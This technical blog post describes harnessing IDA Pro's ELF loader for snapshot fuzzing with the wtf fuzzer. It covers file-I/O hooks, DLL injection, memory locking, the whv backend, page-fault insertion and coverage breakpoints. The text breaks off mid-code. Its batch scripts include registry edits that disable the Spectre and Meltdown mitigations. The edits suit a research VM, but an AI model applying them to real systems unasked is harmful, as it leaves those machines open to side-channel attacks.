The last basic block that I needed was user-mode crash detection. I had done some past work in the user exception handler so I kind of knew my way around it. I decided to hook ntdll!RtlDispatchException & nt!KiRaiseSecurityCheckFailure to detect fail-fast exceptions that can be triggered by a stack cookie check failure.

Harnessing IDA: walking barefoot into the desert

Once I was done writing the basic features, I started to harness IDA. I knew I wanted to target the loader plugins and, based on their sizes as well as past vulnerabilities, it felt like looking at ELF was my best chance.

I initially started to harness IDA with its GUI and everything. In retrospect, this was bonkers as I remember handling tons of weird things related to Qt and win32k. After a few weeks of making progress here and there I realized that IDA had a few options to make my life easier:

• IDA_NO_HISTORY=1 meant that I didn't have to handle as many registry accesses,
• The -B option allows running IDA in batch-mode from the command line,
• TVHEADLESS=1 also helped a lot regarding GUI/Qt stuff I was working around.

Some of those options were documented later that year by Igor in this blog post: Igor’s tip of the week #08: Batch mode under the hood.

Inserting test case

After finding out about those options it immediately felt like harnessing was possible again.
The main problem I had was that IDA reads the input file lazily via fread, fseek, etc. It also reads a bunch of other things like configuration files, the license file, etc. To be able to deliver my test cases I implemented a layer of hooks that allowed me to pass through file i/o from the guest to my host. This allowed me to read my IDA license keys, the configuration files as well as my input. It also meant that I could sink file writes made to the .id0, .id1, .nam, and all the files that IDA generates that I didn't care about. This was quite a bit of work and it was not really fun work either. I was not a big fan of this pass through layer because I was worried that a bug in my code could mean overwriting files on my host or lead to that kind of badness. That is why I decided to replace this pass-through layer by reading from memory buffers. During startup, wtf reads the actual files into buffers and the file-system hooks deliver the bytes as needed. You can see this work in fshooks.cc. This is an example of what this layer allowed me to do: bool Ida64ConfigureFsHandleTable(const fs::path &GuestFilesPath) { // // Those files are files we want to redirect to host files. When there is // a hooked i/o targeted to one of them, we deliver the i/o on the host // by calling the appropriate syscalls and proxy back the result to the // guest. 
// const std::vector<std::u16string> GuestFiles = { uR"(\??\C:\Program Files\IDA Pro 7.5\ida.key)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\ida.cfg)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\noret.cfg)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\pe.cfg)", uR"(\??\C:\Program Files\IDA Pro 7.5\plugins\plugins.cfg)"}; for (const auto &GuestFile : GuestFiles) { const size_t LastSlash = GuestFile.find_last_of(uR"(\)"); if (LastSlash == GuestFile.npos) { fmt::print("Expected a / in {}\n", u16stringToString(GuestFile)); return false; } const std::u16string GuestFilename = GuestFile.substr(LastSlash + 1); const fs::path HostFile(GuestFilesPath / GuestFilename); size_t BufferSize = 0; const auto Buffer = ReadFile(HostFile, BufferSize); if (Buffer == nullptr || BufferSize == 0) { fmt::print("Expected to find {}.\n", HostFile.string()); return false; } g_FsHandleTable.MapExistingGuestFile(GuestFile.c_str(), Buffer.get(), BufferSize); } g_FsHandleTable.MapExistingWriteableGuestFile( uR"(\??\C:\Users\over\Desktop\wtf_input.id0)"); g_FsHandleTable.MapNonExistingGuestFile( uR"(\??\C:\Users\over\Desktop\wtf_input.id1)"); g_FsHandleTable.MapNonExistingGuestFile( uR"(\??\C:\Users\over\Desktop\wtf_input.nam)"); g_FsHandleTable.MapNonExistingGuestFile( uR"(\??\C:\Users\over\Desktop\wtf_input.id2)"); // // Those files are files we want to pretend that they don't exist in the // guest. 
// const std::vector<std::u16string> NotFounds = { uR"(\??\C:\Program Files\IDA Pro 7.5\ida64.int)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\idsnames)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc6.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc9.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\flirt.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\geos.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\linux.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\os2.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win7.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\wince.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\loaders\hppacore.idc)", uR"(\??\C:\Users\over\AppData\Roaming\Hex-Rays\IDA Pro\proccache64.lst)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\Latin_1.clt)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\dwarf.cfg)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\atrap.cfg)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\hpux.cfg)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\i960.cfg)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\goodname.cfg)"}; for (const std::u16string &NotFound : NotFounds) { g_FsHandleTable.MapNonExistingGuestFile(NotFound.c_str()); } g_FsHandleTable.SetBlacklistDecisionHandler([](const std::u16string &Path) { // \ids\pc\api-ms-win-core-profile-l1-1-0.idt // \ids\api-ms-win-core-profile-l1-1-0.idt // \sig\pc\vc64seh.sig // \til\pc\gnulnx_x64.til // 6ba8075c8f243566350f741c7d6e9318089add.debug const bool IsIdt = Path.ends_with(u".idt"); const bool IsIds = Path.ends_with(u".ids"); const bool IsSig = Path.ends_with(u".sig"); const bool IsTil = Path.ends_with(u".til"); const bool IsDebug = Path.ends_with(u".debug"); const bool Blacklisted = IsIdt || IsIds || IsSig || IsTil || IsDebug; if (Blacklisted) { return true; } // // The parser can invoke ida64!import_module to have the user select // a file that gets imported 
by the binary currently analyzed. This is // fine if the import directory is well formated, when it's not it // potentially uses garbage in the file as a path name. Strategy here // is to block the access if the path is not ASCII. // for (const auto &C : Path) { if (isascii(C)) { continue; } DebugPrint("Blocking a weird NtOpenFile: {}\n", u16stringToString(Path)); return true; } return false; }); return true; }  Although this was probably the most annoying problem to deal with, I had to deal with tons more. I've decided to walk you through some of them. Problem 1: Pre-load dlls For IDA to know which loader is the right loader to use it loads all of them and asks them if they know what this file is. Remember that there is no disk when running in wtf so loading a DLL is a problem. This problem was solved by injecting the DLLs with inject into IDA before generating the snapshot so that when it loads them it doesn't generate file i/o. The same problem happens with delay-loaded DLLs. Problem 2: Paged-out memory On Windows, memory can be swapped out and written to disk into the pagefile.sys file. When somebody accesses memory that has been paged out, the access triggers a #PF which the page fault handler resolves by loading the page back up from the pagefile. But again, this generates file i/o. I solved this problem for user-mode with lockmem which is a small utility that locks all virtual memory ranges into the process working set. As an example, this is the script I used to snapshot IDA and it highlights how I used both inject and lockmem: set BASE_DIR=C:\Program Files\IDA Pro 7.5 set PLUGINS_DIR=%BASE_DIR%\plugins set LOADERS_DIR=%BASE_DIR%\loaders set PROCS_DIR=%BASE_DIR%\procs set NTSD=C:\Users\over\Desktop\x64\ntsd.exe REM Remove a bunch of plugins del "%PLUGINS_DIR%\python.dll" del "%PLUGINS_DIR%\python64.dll" [...] 
REM Turning on PH
REM 02000000 Enable page heap (full page heap)
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "GlobalFlag" /t REG_SZ /d "0x2000000" /f
REM This is useful to disable stack-traces
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "PageHeapFlags" /t REG_SZ /d "0x0" /f
REM History is stored in the registry and so triggers cr3 change (when attaching to Registry process VA)
set IDA_NO_HISTORY=1
REM Set up headless mode and run IDA
set TVHEADLESS=1
REM https://www.hex-rays.com/products/ida/support/idadoc/417.shtml
start /b %NTSD% -d "%BASE_DIR%\ida64.exe" -B wtf_input
REM bp ida64!init_database
REM Bump suspend count: ~0n
REM Detach: qd
REM Find process, set ba e1 on address from kdbg
REM ntsd -pn ida64.exe ; fix suspend count: ~0m
REM should break.
REM Inject the dlls.
inject.exe ida64.exe "%PLUGINS_DIR%"
inject.exe ida64.exe "%LOADERS_DIR%"
inject.exe ida64.exe "%PROCS_DIR%"
inject.exe ida64.exe "%BASE_DIR%\libdwarf.dll"
REM Lock everything
lockmem.exe ida64.exe
REM You can now reattach; and ~0m to bump down the suspend count
%NTSD% -pn ida64.exe

Problem 3: Manually soft page-fault in memory from hooks

To insert my test cases in memory I used the file system hook layer I described above as well as the virtual memory facilities that we talked about earlier. Sometimes, the caller would allocate a memory buffer and call, let's say, fread to read the file into the buffer. When fread was invoked, my hook triggered, and sometimes calling VirtWrite would fail. After debugging and inspecting the state of the PTEs it was clear that the PTE was in an invalid state. The explanation is that memory is lazy on Windows: a page fault is expected to fire on first access, the handler fixes the PTE, and execution carries on. Because we are doing the memory write ourselves, we don't generate a page fault and so the page fault handler doesn't get invoked.
To solve this, I try to do a virtual to physical translation and inspect the result. If the translation is successful it means the page tables are in a good state and I can perform the memory access. If it is not, I insert a page fault in the guest and resume execution. When execution restarts, the page fault handler runs, fixes the PTE, and returns execution to the instruction that was executing before the page fault. Because we have our hook there, we get reinvoked a second time but this time the virtual to physical translation works and we can do the memory write. Here is an example in ntdll!NtQueryAttributesFile:

if (!g_Backend->SetBreakpoint(
        "ntdll!NtQueryAttributesFile", [](Backend_t *Backend) {
          // NTSTATUS NtQueryAttributesFile(
          //  _In_  POBJECT_ATTRIBUTES      ObjectAttributes,
          //  _Out_ PFILE_BASIC_INFORMATION FileInformation
          //);
          // ...
          //
          // Ensure that the GuestFileInformation is faulted-in memory.
          //
          if (GuestFileInformation &&
              Backend->PageFaultsMemoryIfNeeded(
                  GuestFileInformation, sizeof(FILE_BASIC_INFORMATION))) {
            return;
          }

Problem 4: KVA shadow

When I snapshot IDA the CPU is in user-mode but some of the breakpoints I set up are on functions living in kernel-mode. To be able to set a breakpoint on those, wtf simply does a VirtTranslate and modifies physical memory with an int3 opcode. This is exactly what KVA Shadow prevents: the user @cr3 doesn't contain the part of the page tables that describe kernel-mode (only a few stubs) and so there is no valid translation.
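To make the dependency on the translation concrete, here is a toy model of a software breakpoint set through physical memory. It is a sketch under assumptions, not wtf's implementation: BreakpointSketch_t, its byte-addressed PhysMem map and the Translate callback are all hypothetical stand-ins for the real backend facilities.

```cpp
#include <cassert>
#include <cstdint>
#include <functional>
#include <optional>
#include <unordered_map>

// Toy model, not wtf's real classes: byte-addressed guest physical memory
// plus a pluggable GVA -> GPA translation callback.
struct BreakpointSketch_t {
  std::unordered_map<uint64_t, uint8_t> PhysMem;     // GPA -> current byte
  std::unordered_map<uint64_t, uint8_t> SavedBytes;  // GPA -> original byte
  std::function<std::optional<uint64_t>(uint64_t)> Translate;

  // Translate the GVA, remember the original byte, then write int3 (0xcc).
  // Returns false when the address has no valid translation.
  bool Set(uint64_t Gva) {
    assert(Translate);
    const std::optional<uint64_t> Gpa = Translate(Gva);
    if (!Gpa) {
      return false;
    }
    if (SavedBytes.count(*Gpa) == 0) {
      SavedBytes.emplace(*Gpa, PhysMem[*Gpa]);
      PhysMem[*Gpa] = 0xcc;
    }
    return true;
  }

  // Put the original byte back if a breakpoint was set at this address.
  bool Remove(uint64_t Gva) {
    assert(Translate);
    const std::optional<uint64_t> Gpa = Translate(Gva);
    if (!Gpa) {
      return false;
    }
    const auto It = SavedBytes.find(*Gpa);
    if (It == SavedBytes.end()) {
      return false;
    }
    PhysMem[*Gpa] = It->second;
    SavedBytes.erase(It);
    return true;
  }
};
```

In this model, a Translate callback that walks the user page tables of a KVA-shadowed process returns nothing for a kernel address, so Set fails before a single byte is patched.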
To solve this I simply disabled KVA shadow with the below edits in the registry:

REM To disable mitigations for CVE-2017-5715 (Spectre Variant 2) and CVE-2017-5754 (Meltdown)
REM https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f


Problem 5: Identifying bottlenecks

While developing wtf I set time aside to profile the tool under specific workloads with the Intel VTune Profiler, which is now free. If you have never used it, you really should as it is both absolutely fascinating and really useful. If you care about performance, you need to measure to understand where you can have the most impact. Not measuring is a big mistake because you will most likely spend time changing code that might not even matter. If you try to optimize something you should also be able to measure the impact of your change.

For example, here is the VTune hotspot analysis report for the following invocation:

wtf.exe run --name hevd --backend whv --state targets\hevd\state --runs=100000 --input targets\hevd\crashes\crash-0xfffff764b91c0000-0x0-0xffffbf84fb10e780-0x2-0x0


This report is really catastrophic because it means we spend twice as much time dealing with memory access faults as actually running target code. Handling memory access faults should take very little time. If anybody knows their way around whv & performance it'd be great to reach out because I really have no idea why it is that slow.

The birth of hope

After tons of work, I could finally execute the ELF loader from start to end and see the messages you would see in the output window.
In the below, you can see IDA loading the elf64.dll loader then initializes the database as well as the btree. Then, it loads up processor modules, creates segments, processes relocations, and finally loads the dwarf modules to parse debug information: >wtf.exe run --name ida64-elf75 --backend whv --state state --input ntfs-3g Initializing the debugger instance.. (this takes a bit of time) Parsing coverage\dwarf64.cov.. Parsing coverage\elf64.cov.. Parsing coverage\libdwarf.cov.. Applied 43624 code coverage breakpoints [...] Running ntfs-3g [...] ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\loaders\elf64.dll) ida64: ida64!msg(format="Possible file format: %s (%s) ", ...) ida64: ELF64 for x86-64 (Shared object) - ELF64 for x86-64 (Shared object) [...] ida64: ida64!msg(format=" bytes pages size description --------- ----- ---- -------------------------------------------- %9lu %5u %4u allocating memory for b-tree... ", ...) ida64: ida64!msg(format="%9u %5u %4u allocating memory for virtual array... ", ...) ida64: ida64!msg(format="%9u %5u %4u allocating memory for name pointers... ----------------------------------------------------------------- %9u total memory allocated ", ...) ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k064.dll) ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k0s64.dll) ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\ad218x64.dll) ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\alpha64.dll) [...] ida64: ida64!msg(format="Loading file '%s' into database... Detected file format: %s ", ...) ida64: ida64!msg(format="Loading processor module %s for %s...", ...) ida64: ida64!msg(format="Initializing processor module %s...", ...) ida64: ida64!msg(format="OK ", ...) ida64: ida64!mbox(format="@0:1139[] Can't use BIOS comments base.", ...) ida64: ida64!msg(format="%s -> %s ", ...) ida64: ida64!msg(format="Autoanalysis subsystem has been initialized. ", ...) 
ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!msg(format="%s -> %s ", ...) [...] ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!mbox(format="Reading symbols", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!mbox(format="Loading symbols", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!mbox(format="", ...) ida64: ida64!msg(format="Processing relocations... ", ...) ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...) ida64: ida64!mbox(format="Unexpected entries in the PLT stub. The file might have been modified after linking.", ...) ida64: ida64!msg(format="%s -> %s ", ...) ida64: Unexpected entries in the PLT stub. The file might have been modified after linking. ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...) [...] ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...) 
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...) ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...) ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...) ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dbg64.dll) ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dwarf64.dll) ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\libdwarf.dll) ida64: ida64!msg(format="%s", ...) ida64: ida64!msg(format="no. ", ...) ida64: ida64!msg(format="%s", ...) ida64: ida64!msg(format="no. ", ...) ida64: ida64!msg(format="Plugin "%s" not found ", ...) ida64: Hit the end of load file :o  Need for speed: whv backend At this point, I was able to fuzz IDA but the speed was incredibly slow. I could execute about 0.01 test cases per second. It was really cool to see it working, finding new code coverage, etc. but I felt I wouldn't find much at this speed. That's why I decided to look at using whv to implement an execution backend. I had played around with whv before with pywinhv so I knew the features offered by the API well. As this was the first execution backend using virtualization I had to rethink a bunch of the fundamentals. Code coverage What I settled for is to use one-time software breakpoints at the beginning of basic blocks. The user simply needs to generate a list of breakpoint addresses into a JSON file and wtf consumes this file during initialization. This means that the user can selectively pick the modules that it wants coverage for. It is annoying though because it means you need to throw those modules in IDA and generate the JSON file for each of them. The script I use for that is available here: gen_coveragefile_ida.py. 
You could obviously generate the file yourself via other tools. Overall I think it is a good enough tradeoff.

I did try to play with more creative & esoteric ways to acquire code coverage though. One of them was filling the address space with int3s and lazily populating code, leveraging a length-disassembler engine to know the size of instructions. I loved this idea but I ran into tons of problems with switch tables that embed data in code sections. This means that wtf corrupts them when setting software breakpoints, which leads to a bunch of spectacular crashes a little bit everywhere in the system, so I abandoned this idea. The trap flag was awfully slow and whv doesn't expose the Monitor Trap Flag. The ideal for me would be to find a way to conserve the performance and acquire code coverage without knowing anything about the target, like in bochscpu.

Dirty memory

The other thing that I needed was to be able to track dirty memory. whv provides WHvQueryGpaRangeDirtyBitmap to do just that, which was perfect.

Tracing

One thing that I would have loved was to be able to generate execution traces like with bochscpu. I initially thought I'd be able to mirror this functionality using the trap flag. If you turn on the trap flag before, let's say, a syscall instruction, the trap gets raised after the instruction and so you miss the entire kernel side executing. I discovered that this is due to how syscall is implemented: it masks RFLAGS with the IA32_FMASK MSR, stripping away the trap flag. After programming IA32_FMASK myself I could trace through syscalls, which was great. By comparing traces generated by the two backends, I noticed that the whv trace was missing page faults. This is basically another instance of the same problem: when an interrupt happens, the CPU saves the current context and loads a new one from the task segment, which doesn't have the trap flag set.
I can't remember if I got that working or if this turned out to be harder than it looked but I ended up reverting the code and settled for only generating code coverage traces. It is definitely something I would love to revisit in the future. Timeout To protect the fuzzer against infinite loops and to limit the execution time, I use a timer to tell the virtual processor to stop execution. This is also not as good as what bochscpu offered us because not as precise but that's the only solution I could come up with: class TimerQ_t { HANDLE TimerQueue_ = nullptr; HANDLE LastTimer_ = nullptr; static void CALLBACK AlarmHandler(PVOID, BOOLEAN) { reinterpret_cast<WhvBackend_t *>(g_Backend)->CancelRunVirtualProcessor(); } public: ~TimerQ_t() { if (TimerQueue_) { DeleteTimerQueueEx(TimerQueue_, nullptr); } } TimerQ_t() = default; TimerQ_t(const TimerQ_t &) = delete; TimerQ_t &operator=(const TimerQ_t &) = delete; void SetTimer(const uint32_t Seconds) { if (Seconds == 0) { return; } if (!TimerQueue_) { TimerQueue_ = CreateTimerQueue(); if (!TimerQueue_) { fmt::print("CreateTimerQueue failed.\n"); exit(1); } } if (!CreateTimerQueueTimer(&LastTimer_, TimerQueue_, AlarmHandler, nullptr, Seconds * 1000, Seconds * 1000, 0)) { fmt::print("CreateTimerQueueTimer failed.\n"); exit(1); } } void TerminateLastTimer() { DeleteTimerQueueTimer(TimerQueue_, LastTimer_, nullptr); } };  Inserting page faults To be able to insert a page fault into the guest I use the WHvRegisterPendingEvent register and a WHvX64PendingEventException event type: bool WhvBackend_t::PageFaultsMemoryIfNeeded(const Gva_t Gva, const uint64_t Size) { const Gva_t PageToFault = GetFirstVirtualPageToFault(Gva, Size); // // If we haven't found any GVA to fault-in then we have no job to do so we // return. 
// if (PageToFault == Gva_t(0xffffffffffffffff)) { return false; } WhvDebugPrint("Inserting page fault for GVA {:#x}\n", PageToFault); // cf 'VM-Entry Controls for Event Injection' in Intel 3C WHV_REGISTER_VALUE_t Exception; Exception->ExceptionEvent.EventPending = 1; Exception->ExceptionEvent.EventType = WHvX64PendingEventException; Exception->ExceptionEvent.DeliverErrorCode = 1; Exception->ExceptionEvent.Vector = WHvX64ExceptionTypePageFault; Exception->ExceptionEvent.ErrorCode = ErrorWrite | ErrorUser; Exception->ExceptionEvent.ExceptionParameter = PageToFault.U64(); if (FAILED(SetRegister(WHvRegisterPendingEvent, &Exception))) { __debugbreak(); } return true; }  Determinism The last feature that I wanted was to try to get as much determinism as I could. After tracing a bunch of executions I realized nt!ExGenRandom uses rdrand in the Windows kernel and this was a big source of non-determinism in executions. Intel does support generating vmexit when the instruction is called but this is also not exposed by whv. I settled for a breakpoint on the function and emulate its behavior with a deterministic implementation: // // Make ExGenRandom deterministic. // // kd> ub fffff8053b8287c4 l1 // nt!ExGenRandom+0xe0: // fffff8053b8287c0 480fc7f2 rdrand rdx const Gva_t ExGenRandom = Gva_t(g_Dbg.GetSymbol("nt!ExGenRandom") + 0xe4); if (!g_Backend->SetBreakpoint(ExGenRandom, [](Backend_t *Backend) { DebugPrint("Hit ExGenRandom!\n"); Backend->Rdx(Backend->Rdrand()); })) { return false; }  I am not a huge fan of this solution because it means you need to know where non-determinism is coming from which is usually hard to figure out in the first place. Another source of non-determinism is the timestamp counter. As far as I can tell, this hasn't led to any major issues though but this might bite us in the future. With the above implemented, I was able to run test cases through the backend end to end which was great. Below I describe some of the problems I solved while testing it. 
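
To illustrate what a deterministic replacement for rdrand could look like, here is a minimal sketch based on the SplitMix64 generator. The names DeterministicRdrand_t, Next and Reset are hypothetical and this is not wtf's actual implementation of Backend->Rdrand(); the only point is that a fixed seed, rewound every time the snapshot is restored, makes every test case observe the same sequence of values.

```cpp
#include <cstdint>

// Hypothetical stand-in for a deterministic rdrand (not wtf's actual code):
// a SplitMix64 generator that can be rewound to its seed.
class DeterministicRdrand_t {
  const uint64_t Seed_;
  uint64_t State_;

public:
  explicit DeterministicRdrand_t(const uint64_t Seed)
      : Seed_(Seed), State_(Seed) {}

  // Returns the next value of the sequence (SplitMix64 step).
  uint64_t Next() {
    State_ += 0x9e3779b97f4a7c15ULL;
    uint64_t Z = State_;
    Z = (Z ^ (Z >> 30)) * 0xbf58476d1ce4e5b9ULL;
    Z = (Z ^ (Z >> 27)) * 0x94d049bb133111ebULL;
    return Z ^ (Z >> 31);
  }

  // Rewinds the generator; meant to be called when the snapshot is restored
  // so that every test case starts from the same state.
  void Reset() { State_ = Seed_; }
};
```

In this sketch, the breakpoint handler would write the result of Next() into @rdx and the restore path would call Reset() before running the next test case.
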
Problem 6: Code coverage breakpoints not free Profiling wtf revealed that my code coverage breakpoints that I thought free were not quite that free. The theory is that they are one-time breakpoints and as a result, you pay for their cost only once. This leads to a warm-up cost that you pay at the start of the run as the fuzzer is discovering sections of code highly reachable. But if you look at it over time, it should become free. The problem in my implementation was in the code used to restore those breakpoints after executing a test case. I tracked the code coverage breakpoints that haven't been hit in a list. When restoring, I would start by restoring every dirty page and I would iterate through this list to reset the code-coverage breakpoints. It turns out this was highly inefficient when you have hundreds of thousands of breakpoints. I did what you usually do when you have a performance problem: I traded CPU time for memory. The answer to this problem is the Ram_t class. The way it works is that every time you add a code coverage breakpoint, it duplicates the page and sets a breakpoint in this page as well as the guest RAM. // // Add a breakpoint to a GPA. // uint8_t *AddBreakpoint(const Gpa_t Gpa) { const Gpa_t AlignedGpa = Gpa.Align(); uint8_t *Page = nullptr; // // Grab the page if we have it in the cache // if (Cache_.contains(Gpa.Align())) { Page = Cache_.at(AlignedGpa); } // // Or allocate and initialize one! // else { Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size); if (Page == nullptr) { fmt::print("Failed to call aligned_alloc.\n"); return nullptr; } const uint8_t *Virgin = Dmp_.GetPhysicalPage(AlignedGpa.U64()) + AlignedGpa.Offset().U64(); if (Virgin == nullptr) { fmt::print( "The dump does not have a page backing GPA {:#x}, exiting.\n", AlignedGpa); return nullptr; } memcpy(Page, Virgin, Page::Size); } // // Apply the breakpoint. 
// const uint64_t Offset = Gpa.Offset().U64(); Page[Offset] = 0xcc; Cache_.emplace(AlignedGpa, Page); // // And also update the RAM. // Ram_[Gpa.U64()] = 0xcc; return &Page[Offset]; }  When a code coverage breakpoint is hit, the class removes the breakpoint from both of those locations. // // Remove a breakpoint from a GPA. // void RemoveBreakpoint(const Gpa_t Gpa) { const uint8_t *Virgin = GetHvaFromDump(Gpa); uint8_t *Cache = GetHvaFromCache(Gpa); // // Update the RAM. // Ram_[Gpa.U64()] = *Virgin; // // Update the cache. We assume that an entry is available in the cache. // *Cache = *Virgin; }  When you restore dirty memory, you simply iterate through the dirty page and ask the Ram_t class to restore the content of this page. Internally, the class checks if the page has been duplicated and if so it restores from this copy. If it doesn't have, it restores the content from the dump file. This lets us restore code coverage breakpoints at extra memory costs: // // Restore a GPA from the cache or from the dump file if no entry is // available in the cache. // const uint8_t *Restore(const Gpa_t Gpa) { // // Get the HVA for the page we want to restore. // const uint8_t *SrcHva = GetHva(Gpa); // // Get the HVA for the page in RAM. // uint8_t *DstHva = Ram_ + Gpa.Align().U64(); // // It is possible for a GPA to not exist in our cache and in the dump file. // For this to make sense, you have to remember that the crash-dump does not // contain the whole amount of RAM. In which case, the guest OS can decide // to allocate new memory backed by physical pages that were not dumped // because not currently used by the OS. // // When this happens, we simply zero initialize the page as.. this is // basically the best we can do. The hope is that if this behavior is not // correct, the rest of the execution simply explodes pretty fast. // if (!SrcHva) { memset(DstHva, 0, Page::Size); } // // Otherwise, this is straight forward, we restore the source into the // destination. 
If we had a copy, then that is what we are writing to the // destination, and if we didn't have a copy then we are restoring the // content from the crash-dump. // else { memcpy(DstHva, SrcHva, Page::Size); } // // Return the HVA to the user in case it needs to know about it. // return DstHva; }  Problem 7: Code coverage with IDA I mentioned above that I was using IDA to generate the list of code coverage breakpoints that wtf needed. At first, I thought this was a bulletproof technique but I encountered a pretty annoying bug where IDA was tagging switch-tables as code instead of data. This leads to wtf corrupting switch-tables with cc's and it led to the guest crashing in spectacular ways. I haven't run into this bug with the latest version of IDA yet which was nice. Problem 8: Rounds of optimization After profiling the fuzzer, I noticed that WHvQueryGpaRangeDirtyBitmap was extremely slow for unknown reasons. To fix this, I ended up emulating the feature by mapping memory as read / execute in the EPT and track dirtiness when receiving a memory fault doing a write. HRESULT WhvBackend_t::OnExitReasonMemoryAccess( const WHV_RUN_VP_EXIT_CONTEXT &Exception) { const Gpa_t Gpa = Gpa_t(Exception.MemoryAccess.Gpa); const bool WriteAccess = Exception.MemoryAccess.AccessInfo.AccessType == WHvMemoryAccessWrite; if (!WriteAccess) { fmt::print("Dont know how to handle this fault, exiting.\n"); __debugbreak(); return E_FAIL; } // // Remap the page as writeable. // const WHV_MAP_GPA_RANGE_FLAGS Flags = WHvMapGpaRangeFlagWrite | WHvMapGpaRangeFlagRead | WHvMapGpaRangeFlagExecute; const Gpa_t AlignedGpa = Gpa.Align(); DirtyGpa(AlignedGpa); uint8_t *AlignedHva = PhysTranslate(AlignedGpa); return MapGpaRange(AlignedHva, AlignedGpa, Page::Size, Flags); }  Once fixed, I noticed that WHvTranslateGva also was slower than I expected. 
This is why I also emulated its behavior by walking the page tables myself: HRESULT WhvBackend_t::TranslateGva(const Gva_t Gva, const WHV_TRANSLATE_GVA_FLAGS, WHV_TRANSLATE_GVA_RESULT &TranslationResult, Gpa_t &Gpa) const { // // Stole most of the logic from @yrp604's code so thx bro. // const VIRTUAL_ADDRESS GuestAddress = Gva.U64(); const MMPTE_HARDWARE Pml4 = GetReg64(WHvX64RegisterCr3); const uint64_t Pml4Base = Pml4.PageFrameNumber * Page::Size; const Gpa_t Pml4eGpa = Gpa_t(Pml4Base + GuestAddress.Pml4Index * 8); const MMPTE_HARDWARE Pml4e = PhysRead8(Pml4eGpa); if (!Pml4e.Present) { TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent; return S_OK; } const uint64_t PdptBase = Pml4e.PageFrameNumber * Page::Size; const Gpa_t PdpteGpa = Gpa_t(PdptBase + GuestAddress.PdPtIndex * 8); const MMPTE_HARDWARE Pdpte = PhysRead8(PdpteGpa); if (!Pdpte.Present) { TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent; return S_OK; } // // huge pages: // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page // directory; see Table 4-1 // const uint64_t PdBase = Pdpte.PageFrameNumber * Page::Size; if (Pdpte.LargePage) { TranslationResult.ResultCode = WHvTranslateGvaResultSuccess; Gpa = Gpa_t(PdBase + (Gva.U64() & 0x3fff'ffff)); return S_OK; } const Gpa_t PdeGpa = 